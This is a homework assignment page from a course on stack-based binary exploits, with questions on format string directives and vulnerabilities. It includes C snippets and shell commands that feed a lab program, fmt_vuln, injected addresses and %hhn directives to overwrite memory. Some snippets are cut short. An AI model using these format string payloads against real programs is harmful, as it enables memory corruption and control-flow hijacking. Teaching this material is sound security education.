SI485H: Stack Based Binary Exploits (SP17)

Home Policy Calendar Units Assignments Resources

HW 7: Format Strings


  • You must turn in a sheet of paper that is neatly typed or written answering the questions below. (You are strongly encouraged to type your homework.)
  • This homework is graded out of 70 points. Point values are associated to each question.


  1. Describe, briefly, what each of the formats present the result. For example, you might say for "%s" that it format prints a string, and for "%2s" you might say that it prints 2 bytes of a string.
    1. %n
    2. %hn
    3. %hhn
    4. %hhx
    5. %10$x
    6. %p
    7. %08x
    8. %8x
    9. %03.2f
  2. What is the output from the following example format? Explain.

    int a;
    printf(“%0.10s%n\n”, “Go Navy! Beat Army!”, &a);
  3. Consider the following program code

    int i=0;
    int a;
    char buf[100];
    while( scanf(“%s%n”,buf,&a) > 0){
      printf(“%#x: %s (%d)”, i, buf, a);

    What do you expect the output of the second printf() will be given some user's input? Explain.

  4. Consider the following code:

    char outputbuf[128];

    Provide a format for inputbuf that uses a single % directective that overflows outputbuf by 5 bytes. Explain why this works.

  5. For the following format print, diagram the stack frame right after the function printf() is called. Include the stack diagram for both printf() and foo():

    void foo(int d){
      printf("The value of d is: %10$d\n");
  6. Consider the following code:

    void foo(){
       int d = 10;
       printf("The value of d is: %d\n",d);

    What do you expect the output of the second printf() will be? Explain.

  7. When conducting a format string attack, consider the following format and output:

    $ ./fmt_vuln BBBB.%#08x.%#08x.%#08x.%#08x
    Right: BBBB.%#08x.%#08x.%#08x.%#08x
    Wrong: BBBB.0xbffff2b0.0x000400.0x000004.0x42424242
    [*] test_val @ 0x804a02c = 4276545 0x00414141

    What about Wrong output is instructive about what is currently be referenced by the last %#08x format directive?

  8. Consider the format string attack below:

    $ ./fmt_vuln $(printf "\x2c\xa0\x04\x08").%#08x.%#08x.%#08x.%hhn
    Right: ,.%#08x.%#08x.%#08x.%hhn
    Wrong: ,.0xbffff2b0.0x000400.0x000004.
    [*] test_val @ 0x804a02c = 4276514 0x00414122

    Explain how the $(printf "\x2c\xa0\x04\x08") and the %hhn format directive allows the attacker to write a single byte

  9. Consider the format string attack below:

    user@si485H-base:demo$ ./fmt_vuln $(printf "\x2f\xa0\x04\x08")AAAAAAAAAAAAAAAAAAAAAAA.%#08x.%#08x.%#08x.%hhn
    Right: /AAAAAAAAAAAAAAAAAAAAAAA.%#08x.%#08x.%#08x.%hhn
    Wrong: /AAAAAAAAAAAAAAAAAAAAAAA.0xbffff290.0x000400.0x000004.
    [*] test_val @ 0x804a02c = 960577857 0x39414141

    If we wanted 0x99 to be the value instead of 0x39 when writing the byte, what would we change the format directive to be? Explain.

  10. Consider the below format string attack input: (note: lines ending with \ are continuations)

    $ ./fmt_vuln $(printf "\x2f\xa0\x04\x08")\
    $(printf "\x2e\xa0\x04\x08")\
    $(printf "\x2d\xa0\x04\x08")\
    $(printf "\x2c\xa0\x04\x08")\
    1. Which of the format directives should be chnaged to %hhn? Explain.
    2. Why are all the format lengths predsecribed prior to changing to %hhn? What would happen if we built the format length one part at a time?
    3. Explain why the \$ portion of the format? What is it used for in the format directive? And, why is it escaped with a \ ?